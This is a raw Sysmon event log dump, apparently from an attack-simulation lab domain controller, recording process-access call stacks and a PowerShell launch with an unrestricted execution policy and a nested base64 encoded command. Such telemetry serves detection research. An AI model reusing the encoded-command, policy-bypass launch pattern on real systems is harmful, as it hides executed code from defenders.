10:39:17.062{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.031{733EE690-3DD4-5F80-0203-000000007E01}47841192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68e932a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68334130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68333e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68de5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+682f4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68352e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683364cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683364cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6833635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683282e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68334814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68334407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68334130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68333e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68de5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6831ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6831a232(wow64) 154100x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.043{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.875{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.875{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.843{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_iiicvd11.4kk.ps12020-10-09 10:39:18.843 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.828{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 